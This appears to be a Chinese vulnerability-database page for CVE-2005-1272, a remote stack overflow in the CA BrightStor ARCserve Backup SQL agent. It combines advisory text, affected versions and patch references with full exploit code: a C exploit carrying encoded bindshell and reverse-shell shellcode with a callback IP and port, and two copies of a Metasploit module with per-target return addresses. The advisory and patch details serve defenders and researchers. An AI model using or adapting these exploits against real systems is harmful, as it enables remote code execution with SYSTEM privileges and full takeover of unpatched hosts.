CVE-2005-1272
CVSS7.5
发布时间 :2005-08-05 00:00:00
修订时间 :2008-09-05 16:48:42
NMCOEPS    

[原文]Stack-based buffer overflow in the Backup Agent for Microsoft SQL Server in BrightStor ARCserve Backup Agent for SQL Server 11.0 allows remote attackers to execute arbitrary code via a long string sent to port (1) 6070 or (2) 6050.


[CNNVD]CA BrightStor ARCserve Backup 栈溢出漏洞(CNNVD-200508-064)

        BrightStor ARCserve Backup可为各种平台的服务器提供备份和恢复保护功能。
        BrightStor ARCserve Backup和BrightStor Enterprise Backup Agents for Windows中存在栈溢出漏洞,可能允许远程攻击者以系统权限执行任意代码或导致拒绝服务。溢出的起因是没有对发送给6070端口的数据执行正确的边界检查。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ca:brightstor_arcserve_backup:11.1::windows
cpe:/a:ca:brightstor_arcserve_backup_agent:11.1::sql
cpe:/a:ca:brightstor_enterprise_backup_agent:10.5::oracle
cpe:/a:ca:brightstor_arcserve_backup_agent:9.0.1::exchange
cpe:/a:ca:brightstor_arcserve_backup_agent:9.0.1::sap
cpe:/a:ca:brightstor_enterprise_backup_agent:10.0::sap
cpe:/a:ca:brightstor_enterprise_backup_agent:10.0::sql
cpe:/a:ca:brightstor_enterprise_backup:10.0Computer Associates BrightStor Enterprise Backup 10.0
cpe:/a:ca:brightstor_arcserve_backup_agent:11.0::sql
cpe:/a:ca:brightstor_enterprise_backup_agent:10.5::sql
cpe:/a:ca:brightstor_enterprise_backup_agent:10.5::sap
cpe:/a:ca:brightstor_arcserve_backup:11.1::oracle
cpe:/a:ca:brightstor_arcserve_backup:9.0_1::oracle
cpe:/a:ca:brightstor_enterprise_backup:10.5Computer Associates BrightStor Enterprise Backup 10.5
cpe:/a:ca:brightstor_arcserve_backup_agent:9.0.1::sql
cpe:/a:ca:brightstor_arcserve_backup:9.0.1::windows
cpe:/a:ca:brightstor_arcserve_backup_agent:11.0::sap
cpe:/a:ca:brightstor_arcserve_backup:11.0::windows
cpe:/a:ca:brightstor_enterprise_backup_agent:10.0::oracle
cpe:/a:ca:brightstor_arcserve_backup_agent:11.1::exchange
cpe:/a:ca:brightstor_arcserve_backup:11.0::oracle
cpe:/a:ca:brightstor_arcserve_backup_agent:11.1::sap
cpe:/a:ca:brightstor_arcserve_backup_agent:11::exchange

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1272
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1272
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-064
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/279774
(VENDOR_ADVISORY)  CERT-VN  VU#279774
http://xforce.iss.net/xforce/xfdb/21656
(PATCH)  XF  brightstor-enterprise-backup-bo(21656)
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239
(PATCH)  CONFIRM  http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239
http://www.securityfocus.com/bid/14453
(PATCH)  BID  14453
http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities&flashstatus=true
(UNKNOWN)  IDEFENSE  20050803 CA BrightStor ARCserve Backup Agent for MS SQL Server Buffer Overflow

- 漏洞信息

CA BrightStor ARCserve Backup 栈溢出漏洞
高危 缓冲区溢出
2005-08-05 00:00:00 2005-10-20 00:00:00
远程  
        BrightStor ARCserve Backup可为各种平台的服务器提供备份和恢复保护功能。
        BrightStor ARCserve Backup和BrightStor Enterprise Backup Agents for Windows中存在栈溢出漏洞,可能允许远程攻击者以系统权限执行任意代码或导致拒绝服务。溢出的起因是没有对发送给6070端口的数据执行正确的边界检查。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        BrightStor ARCserve Backup r11.1 for Windows:
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70767&startsearch=1
        BrightStor ARCserve Backup r11.0 for Windows:
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70769&startsearch=1
        BrightStor ARCserve Backup v9.01 for Windows:
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70770&startsearch=1
        BrightStor Enterprise Backup v10.5 for Windows:
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70774&startsearch=1
        BrightStor Enterprise Backup v10.0 for Windows:
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70773&startsearch=1

- 漏洞信息 (1130)

CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit (EDBID:1130)
windows remote
2005-08-03 Verified
6070 cybertronic
N/A [点击下载]
/*
 * CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
 *
 * cybertronic[at]gmx[dot]net
 *
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 6070

unsigned char bindshell[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
"\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2"
"\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2"
"\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2"
"\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2"
"\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2"
"\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b"
"\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4"
"\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96"
"\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2"
"\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7"
"\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d"
"\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d"
"\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0"
"\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f"
"\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2"
"\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98"
"\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94"
"\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0"
"\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4"
"\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38"
"\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1"
"\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f"
"\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90"
"\x80\x2f\xa2\x04";

unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";

void
exploit ( int s, unsigned long cbip, unsigned short cbport, int option )
{
	unsigned long pushesp = 0x20c0c1ab;
	char buffer[3289];

	bzero ( &buffer, sizeof ( buffer ) );
	memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
	memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 );
	memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 );
	memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 );

	if ( option == 0 )
	{
		memcpy ( &reverseshell[111], &cbip, 4);
		memcpy ( &reverseshell[118], &cbport, 2);
		memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );
	}
	else
		memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );

	printf ( "attacking with %u bytes...", strlen ( buffer ) );
	write ( s, buffer, strlen ( buffer ) );
	printf ( "done!\n" );
	close ( s );
}

int
main ( int argc, char* argv[] )
{
	int s;
	unsigned long cbip;
	unsigned short cbport;
	struct sockaddr_in remote_addr;
	struct hostent* host_addr;

	if ( argc != 2 )
		if ( argc != 4 )
			{ fprintf ( stderr, "Usage\n-----\n[bindshell] %s <ip>\n[reverseshell] %s <ip> <cbip> <cbport>\n", argv[0], argv[0] ); exit ( 1 ); }

	if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
		{ fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1 ); }

	remote_addr.sin_family = AF_INET;
	remote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr->h_addr );
	remote_addr.sin_port   = htons ( PORT );

	s = socket ( AF_INET, SOCK_STREAM, 0 );
	printf ( "connecting to %s:%u...", argv[1], PORT );
	if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
		{ printf ( "failed!\n" ); exit ( 1 ); }
	printf ( "ok!\n" );

	if ( argc == 4 )
	{
		cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
		cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
		exploit ( s, cbip, cbport, 0 );
	}
	else
		exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
}

// milw0rm.com [2005-08-03]
		

- 漏洞信息 (16403)

CA BrightStor Agent for Microsoft SQL Overflow (EDBID:16403)
windows remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: sql_agent.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor Agent for Microsoft SQL Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the CA BrightStor
				Agent for Microsoft SQL Server. This vulnerability was
				discovered by cybertronic[at]gmx.net.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2005-1272'],
					[ 'OSVDB', '18501' ],
					[ 'BID', '14453'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'],
					[ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# This exploit requires a jmp esp for return
					['ARCServe 11.0 Asbrdcst.dll 12/12/2003',     { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp
					['ARCServe 11.1 Asbrdcst.dll 07/21/2004',     { 'Platform' => 'win', 'Ret' => 0x20c0cd5b }], # push esp, ret
					['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', { 'Platform' => 'win', 'Ret' => 0x20c0cd1b }], # push esp, ret

					# Generic jmp esp's
					['Windows 2000 SP0-SP3 English',              { 'Platform' => 'win', 'Ret' => 0x7754a3ab }], # jmp esp
					['Windows 2000 SP4 English',                  { 'Platform' => 'win', 'Ret' => 0x7517f163 }], # jmp esp
					['Windows XP SP0-SP1 English',                { 'Platform' => 'win', 'Ret' => 0x71ab1d54 }], # push esp, ret
					['Windows XP SP2 English',                    { 'Platform' => 'win', 'Ret' => 0x71ab9372 }], # push esp, ret
					['Windows 2003 SP0 English',                  { 'Platform' => 'win', 'Ret' => 0x71c03c4d }], # push esp, ret
					['Windows 2003 SP1 English',                  { 'Platform' => 'win', 'Ret' => 0x71c033a0 }], # push esp, ret
				],
			'DisclosureDate' => 'Aug 02 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(6070)
			], self.class)
	end


	def exploit

		print_status("Trying target #{target.name}...")

		# The 'one line' request does not work against Windows 2003
		1.upto(5) { |i|

			# Flush some memory
			connect
			begin
				sock.put("\xff" * 0x12000)
				sock.get_once
			rescue
			end
			disconnect


			# 3288 bytes max
			#  696 == good data (1228 bytes contiguous) @ 0293f5e0
			# 3168 == return address
			# 3172 == esp @ 0293ff8c (2476 from good data)

			buf = rand_text_english(3288, payload_badchars)
			buf[ 696, payload.encoded.length ] = payload.encoded
			buf[3168, 4] = [target.ret].pack('V')  # jmp esp
			buf[3172, 5] = "\xe9\x4f\xf6\xff\xff"  # jmp -2476

			connect
			begin
				sock.put(buf)
				sock.get_once
			rescue
			end

			handler
			disconnect
		}
	end

end
		

- 漏洞信息 (F83109)

CA BrightStor Agent for Microsoft SQL Overflow (PacketStormID:F83109)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit
CVE-2005-1272
[点击下载]

This Metasploit module exploits a vulnerability in the CA BrightStor Agent for Microsoft SQL Server. This vulnerability was discovered by cybertronic@gmx.net.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'CA BrightStor Agent for Microsoft SQL Overflow',
			'Description'    => %q{
				This module exploits a vulnerability in the CA BrightStor
				Agent for Microsoft SQL Server. This vulnerability was
				discovered by cybertronic[at]gmx.net.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-1272'],
					[ 'OSVDB', '18501' ],
					[ 'BID', '14453'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'],
					[ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					# This exploit requires a jmp esp for return
					['ARCServe 11.0 Asbrdcst.dll 12/12/2003',     { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp
					['ARCServe 11.1 Asbrdcst.dll 07/21/2004',     { 'Platform' => 'win', 'Ret' => 0x20c0cd5b }], # push esp, ret
					['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', { 'Platform' => 'win', 'Ret' => 0x20c0cd1b }], # push esp, ret

					# Generic jmp esp's
					['Windows 2000 SP0-SP3 English',              { 'Platform' => 'win', 'Ret' => 0x7754a3ab }], # jmp esp
					['Windows 2000 SP4 English',                  { 'Platform' => 'win', 'Ret' => 0x7517f163 }], # jmp esp
					['Windows XP SP0-SP1 English',                { 'Platform' => 'win', 'Ret' => 0x71ab1d54 }], # push esp, ret
					['Windows XP SP2 English',                    { 'Platform' => 'win', 'Ret' => 0x71ab9372 }], # push esp, ret
					['Windows 2003 SP0 English',                  { 'Platform' => 'win', 'Ret' => 0x71c03c4d }], # push esp, ret
					['Windows 2003 SP1 English',                  { 'Platform' => 'win', 'Ret' => 0x71c033a0 }], # push esp, ret
				],
			'DisclosureDate' => 'Aug 02 2005',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(6070)
				], self.class)			
	end



		
	def exploit
		
		print_status("Trying target #{target.name}...")
				
		# The 'one line' request does not work against Windows 2003
		1.upto(5) { |i|
			
			# Flush some memory
			connect
			begin
				sock.put("\xff" * 0x12000)
				sock.get_once
			rescue
			end
			disconnect


			# 3288 bytes max
			#  696 == good data (1228 bytes contiguous) @ 0293f5e0
			# 3168 == return address
			# 3172 == esp @ 0293ff8c (2476 from good data)
			
			buf = rand_text_english(3288, payload_badchars)
			buf[ 696, payload.encoded.length ] = payload.encoded
			buf[3168, 4] = [target.ret].pack('V')  # jmp esp
			buf[3172, 5] = "\xe9\x4f\xf6\xff\xff"  # jmp -2476

			connect
			begin
				sock.put(buf)
				sock.get_once
			rescue
			end
			handler
			disconnect
	}
	end

end
    

- 漏洞信息 (F39049)

iDEFENSE Security Advisory 2005-08-02.t (PacketStormID:F39049)
2005-08-05 00:00:00
iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary
CVE-2005-1272
[点击下载]

iDEFENSE Security Advisory 08.02.05 - Remote exploitation of a buffer overflow in the Backup Agent for Microsoft SQL Server within Computer Associates' BrightStor ARCserve Backup Agent for SQL allows an attacker to execute arbitrary code with SYSTEM privileges.

CA BrightStor ARCserve Backup Agent for MS SQL Server Buffer Overflow

iDEFENSE Security Advisory 08.02.05
www.idefense.com/application/poi/display?id=287&type=vulnerabilities
August 2, 2005

I. BACKGROUND

BrightStor ARCserve Backup for Windows delivers backup and restore
protection for all Windows server systems as well as Windows, Linux,
Mac OS X and UNIX client environments.

http://www3.ca.com/Solutions/ProductFamily.asp?ID=115

II. DESCRIPTION

Remote exploitation of a buffer overflow in the Backup Agent for
Microsoft SQL Server within Computer Associates' BrightStor ARCserve 
Backup Agent for SQL allows an attacker to execute arbitrary code with
SYSTEM privileges.

BrightStor ARCserve Backup Agent for Microsoft SQL Server is a component
of the BrightStor ARCserve Backup system for handling backups of 
Microsoft SQL server data. When a string with a length over 3168 bytes,
is sent to the listening port, 6070 by default, a stack based buffer 
overflow occurs.

III. ANALYSIS

Successful exploitation allows remote attackers to execute arbitrary
code with SYSTEM level privileges. This allows for complete system
compromise including the installation or removal of software and access
to any file on the system.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in Computer
Associates BrightStor ARCserve Backup Agent for Microsoft SQL Server
version 11.0. It is suspected that all versions are vulnerable.

V. WORKAROUND

Restrict remote access at the network boundary, unless remote parties
require service. Access to the affected host should be filtered at the 
network boundary if global accessibility is not required. Restricting 
access to only trusted hosts and networks may reduce the likelihood of 
exploitation.

VI. VENDOR RESPONSE

A vendor advisory for this vulnerability can be found at:

   http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-1272 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/25/2005  Initial vendor notification
04/25/2005  Initial vendor response
08/02/2005  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- 漏洞信息

18501
CA BrightStor ARCserve Backup Agent for Windows Long String Overflow
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A remote stack-based buffer overflow exists in Brightstor Arcserve. The agent software fails to validate user-supplied input resulting in a long string overflow. With a specially crafted request of 3168 bytes to port 6070, an attacker can execute arbitrary code with System privilege resulting in a loss of confidentiality and integrity.

- 时间线

2005-08-02 2005-04-25
2005-08-05 2005-09-02

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Computer Associates has released patches to address this vulnerability: For ARCserve 11.1 apply fix QO70767. For ARCserve 11 apply fix QO70769. For ARCserve 9.01 apply fix QO70770. For Enterprise 10.5 apply fix QO70774. For Enterprise 10 apply fix QO70773.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Computer Associates BrightStor ARCserve Backup Remote Buffer Overflow Vulnerability
Boundary Condition Error 14453
Yes No
2005-08-02 12:00:00 2007-11-15 12:40:00
An anonymous researcher discovered this issue.

- 受影响的程序版本

Computer Associates BrightStor Enterprise Backup Serverless Backup 10.5
Computer Associates BrightStor Enterprise Backup Serverless Backup 10.0
Computer Associates BrightStor Enterprise Backup for Windows 64 bit 10.5
Computer Associates BrightStor Enterprise Backup Agent for SQL 10.5
Computer Associates BrightStor Enterprise Backup Agent for SQL 10.0
Computer Associates BrightStor Enterprise Backup Agent for SAP R/3 10.5
Computer Associates BrightStor Enterprise Backup Agent for SAP R/3 10.0
Computer Associates BrightStor Enterprise Backup Agent for Oracle 10.5
Computer Associates BrightStor Enterprise Backup Agent for Oracle 10.0
Computer Associates BrightStor Enterprise Backup 10.5
Computer Associates BrightStor Enterprise Backup 10.0
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.1
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.0
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 9.0.1
Computer Associates BrightStor ARCserve Backup for Windows (NoEng-Cli) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (NoEng-All) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Eng-Cli) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Eng-All) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Client) 11.1
Computer Associates BrightStor ARCserve Backup for Windows (All) 11.1
Computer Associates BrightStor ARCServe Backup for Windows 11.1
Computer Associates BrightStor ARCServe Backup for Windows 11.0
Computer Associates BrightStor ARCServe Backup for Windows 9.0 .0.1
Computer Associates BrightStor ARCserve Backup for Oracle 11.1
Computer Associates BrightStor ARCserve Backup for Oracle 11.0
Computer Associates BrightStor ARCserve Backup for Oracle 9.0 1
Computer Associates BrightStor ARCserve Backup Agent for SQL 11.1
Computer Associates BrightStor ARCserve Backup Agent for SQL 11.0
Computer Associates BrightStor ARCserve Backup Agent for SQL 9.0 .0.1
Computer Associates BrightStor ARCserve Backup Agent for SAP R/3 11.1
Computer Associates BrightStor ARCserve Backup Agent for SAP R/3 11.0
Computer Associates BrightStor ARCserve Backup Agent for SAP R/3 9.0 1
Computer Associates BrightStor ARCserve Backup Agent for Exchange 11.1
Computer Associates BrightStor ARCserve Backup Agent for Exchange 11.0
Computer Associates BrightStor ARCserve Backup Agent for Exchange 9.0 1

- 漏洞讨论

Computer Associates BrightStor ARCserve Backup and BrightStor Enterprise Backup Agents for Windows are affected by a remote stack-based buffer-overflow vulnerability because the application fails to perform proper bounds checking on data supplied to the application.

A remote attacker may exploit this issue to execute arbitrary code on a vulnerable computer with SYSTEM privileges. A denial-of-service condition may arise as well.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

cybertronic@gmx.net has provided exploit code CABrightStorSQL.c.

cybertronic@gmx.net has also provided exploit code CABrightStorSQL_exp.c.

Exploit code cabrightstor_sqlagent.pm has been released as part of the Metasploit Framework.

- 解决方案

The vendor has released updates addressing this issue.

The vendor has reported that the patch for BrightStor ARCserve Backup r11.1 Agent for SQL for Windows (QO70767) did not fully address this issue. A new patch for BrightStor ARCserve Backup for Windows (QO71010) is available. Users are advised to apply the new patch immediately.


Computer Associates BrightStor ARCserve Backup for Windows (Eng-All) 9.01

Computer Associates BrightStor ARCserve Backup for Windows (Eng-Cli) 9.01

Computer Associates BrightStor ARCserve Backup for Windows (Client) 11.1

Computer Associates BrightStor ARCserve Backup for Windows (NoEng-All) 9.01

Computer Associates BrightStor ARCserve Backup for Windows (NoEng-Cli) 9.01

Computer Associates BrightStor ARCserve Backup for Windows (All) 11.1

Computer Associates BrightStor Enterprise Backup Agent for SQL 10.0

Computer Associates BrightStor Enterprise Backup 10.0

Computer Associates BrightStor Enterprise Backup Serverless Backup 10.0

Computer Associates BrightStor Enterprise Backup Agent for Oracle 10.0

Computer Associates BrightStor Enterprise Backup Agent for SAP R/3 10.0

Computer Associates BrightStor Enterprise Backup Serverless Backup 10.5

Computer Associates BrightStor Enterprise Backup Agent for SQL 10.5

Computer Associates BrightStor Enterprise Backup Agent for SAP R/3 10.5

Computer Associates BrightStor Enterprise Backup 10.5

Computer Associates BrightStor Enterprise Backup for Windows 64 bit 10.5

Computer Associates BrightStor Enterprise Backup Agent for Oracle 10.5

Computer Associates BrightStor ARCserve Backup Agent for SAP R/3 11.0

Computer Associates BrightStor ARCserve Backup Agent for SQL 11.0

Computer Associates BrightStor ARCserve Backup Agent for Exchange 11.0

Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.0

Computer Associates BrightStor ARCServe Backup for Windows 11.0

Computer Associates BrightStor ARCserve Backup for Oracle 11.0

Computer Associates BrightStor ARCserve Backup Agent for Exchange 11.1

Computer Associates BrightStor ARCserve Backup Agent for SAP R/3 11.1

Computer Associates BrightStor ARCserve Backup Agent for SQL 11.1

Computer Associates BrightStor ARCserve Backup for Oracle 11.1

Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.1

Computer Associates BrightStor ARCServe Backup for Windows 11.1

Computer Associates BrightStor ARCServe Backup for Windows 9.0 .0.1

